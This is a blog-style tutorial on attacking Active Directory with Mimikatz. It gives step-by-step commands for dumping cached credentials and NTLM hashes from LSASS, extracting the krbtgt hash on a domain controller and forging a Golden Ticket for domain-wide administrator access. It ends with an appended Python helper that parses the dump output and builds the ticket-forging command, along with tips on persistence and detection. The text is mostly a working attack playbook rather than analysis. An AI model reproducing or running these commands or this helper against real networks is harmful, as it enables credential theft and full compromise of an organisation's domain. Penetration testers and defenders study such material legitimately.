AD ATTACKS WITH MIMIKATZ

Aditya Jha
3 min read · Jul 18, 2023

OVERVIEW

What is Mimikatz?

  • A tool used to view and steal Windows credentials, forge Kerberos tickets, and pivot with what it finds.
  • Dumps credentials cached in memory by the LSASS process.
  • A few of the attacks it supports: credential dumping, Pass-the-Hash, Over-Pass-the-Hash, Pass-the-Ticket, Golden Ticket, Silver Ticket.

CREDENTIAL DUMPING

We will use Mimikatz to dump credentials from a compromised Windows computer.

The assumption is that we have already compromised a machine in the domain, hold local administrator rights on it, and are running the tool from a command prompt on that machine.

So first we download the tool from GitHub (gentilkiwi/mimikatz), copy it to the compromised computer and run it there. Expect endpoint protection to flag the unmodified binary.

Command to start: mimikatz.exe

This command will open a prompt of mimikatz where we can execute commands to dump the credentials.

Our very first command will be:

privilege::debug

We are looking for the output “Privilege '20' OK”.

This enables SeDebugPrivilege for the Mimikatz process. The credentials we want live in the memory of LSASS, and without that privilege Mimikatz cannot open a handle to LSASS to read it, so every sekurlsa command fails with an access error.

privilege::debug only succeeds from an elevated (administrator) prompt. If LSASS runs as a protected process (RunAsPPL) or Credential Guard is enabled, the privilege alone is not enough and the dump will still fail.

So the first attack is credential dumping:

Command: sekurlsa::logonpasswords

This walks the logon sessions cached in LSASS on the machine we are on and prints, per session, the account name, domain, NTLM hash and, where a provider such as WDigest still stores it, the cleartext password. Run on a domain controller it includes every account that has logged on there, which usually means domain administrators.

The Administrator credentials appear in that output (screenshot not reproduced).

LSA DUMP:

lsadump::lsa /patch

This patches LSASS in memory and dumps the NTLM hashes of every account LSA holds: the local SAM accounts on a member machine, and every domain account (krbtgt included) when run on a domain controller. Unlike sekurlsa::logonpasswords it does not depend on who is currently logged on.

GOLDEN TICKET ATTACK

A Golden Ticket is a forged Kerberos TGT encrypted with the krbtgt account's hash. Every domain controller trusts TGTs encrypted with that key, so whoever holds the krbtgt hash can mint a TGT for any user, with any group membership, and authenticate to every service in the domain.

We will use Mimikatz, this time running on a domain controller.

First Command: privilege::debug

Now we will dump the krbtgt account from LSA (this has to run on a domain controller):

Command: lsadump::lsa /inject /name:krbtgt

The output gives us the two values we need: the domain SID on the Domain line and the krbtgt NTLM hash under Primary.

To generate the golden ticket we need the domain name, the domain SID (S-1-5-21-… with no trailing RID) and the krbtgt NTLM hash.

Command: kerberos::golden /user:Administrator /domain:<domain name> /sid:<domain SID> /krbtgt:<NTLM hash> /id:500 /ptt

The /user value does not have to be a real account; the ticket is forged and self-contained, so the KDC never looks the name up. /id:500 sets the RID inside the ticket to 500, the built-in Administrator, so the ticket carries that identity.

/ptt stands for Pass The Ticket: the forged TGT is injected straight into the current logon session instead of being written to a .kirbi file.


Now we will use the command: misc::cmd

This opens a new cmd.exe that inherits the logon session, and with it the injected golden ticket, so anything run from that prompt (a UNC path to a domain controller's admin share, PsExec, WMI) authenticates as the forged Administrator.

We now have domain-wide access and can reach any machine in the domain. Two caveats: the ticket stays valid until the krbtgt password is changed twice, and a ticket lifetime far beyond the domain's policy (Mimikatz defaults to 10 years) is a well-known detection signal.
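As an added example, not from the original post, the following Python helper pulls the domain name, domain SID and krbtgt hash out of saved `lsadump::lsa /inject /name:krbtgt` output and assembles the `kerberos::golden` command. It refuses a malformed hash and strips the RID if a user SID was pasted where the domain SID belongs, which is the most common reason a forged ticket is rejected. The sample text is constructed in the layout of that output; its domain, SID and hash are invented, and the function names are mine.

```python
import re
from typing import Tuple

# Constructed excerpt in the layout of `lsadump::lsa /inject /name:krbtgt` output.
# The domain name, SID and hash are invented for this example.
SAMPLE_LSADUMP = """
Domain : CORP / S-1-5-21-1111111111-2222222222-3333333333

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 0123456789abcdef0123456789abcdef
    LM   :
"""

DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+$")
SID_WITH_RID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")
NTLM_RE = re.compile(r"^[0-9a-fA-F]{32}$")


def domain_sid(sid: str) -> str:
    """Return the domain SID. A user or group SID (domain SID plus RID) is accepted and trimmed."""
    sid = sid.strip()
    if DOMAIN_SID_RE.match(sid):
        return sid
    m = SID_WITH_RID_RE.match(sid)
    if m:
        return m.group(1)  # drop the trailing RID; /id: carries that separately
    raise ValueError(f"not a domain SID: {sid!r}")


def extract_krbtgt(text: str) -> Tuple[str, str, str]:
    """Pull (domain name, domain SID, krbtgt NTLM hash) out of lsadump::lsa output."""
    dom = re.search(r"^Domain\s*:\s*(\S+)\s*/\s*(S-1-5-21-\d+-\d+-\d+)", text, re.M)
    if not dom:
        raise ValueError("no Domain line found")
    # first NTLM line that follows the krbtgt user entry
    krb = re.search(r"^User\s*:\s*krbtgt\s*$.*?^\s*NTLM\s*:\s*([0-9a-fA-F]{32})",
                    text, re.M | re.S)
    if not krb:
        raise ValueError("no krbtgt NTLM hash found")
    return dom.group(1), dom.group(2), krb.group(1).lower()


def golden_ticket_command(user: str, domain: str, sid: str, krbtgt_ntlm: str,
                          rid: int = 500, ptt: bool = True) -> str:
    """Build the kerberos::golden line; /user need not exist, the ticket is self-contained."""
    if not NTLM_RE.match(krbtgt_ntlm):
        raise ValueError("krbtgt hash must be 32 hex characters")
    parts = ["kerberos::golden", f"/user:{user}", f"/domain:{domain}",
             f"/sid:{domain_sid(sid)}", f"/krbtgt:{krbtgt_ntlm.lower()}", f"/id:{int(rid)}"]
    if ptt:
        parts.append("/ptt")
    return " ".join(parts)


if __name__ == "__main__":
    name, sid, ntlm = extract_krbtgt(SAMPLE_LSADUMP)
    print(golden_ticket_command("Administrator", f"{name.lower()}.local", sid, ntlm))
```

The /domain value is the DNS name (corp.local), while the name on the Domain line of the dump is the NetBIOS name, so the example derives one from the other only for its invented data; on a real engagement take the DNS name from the domain itself.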
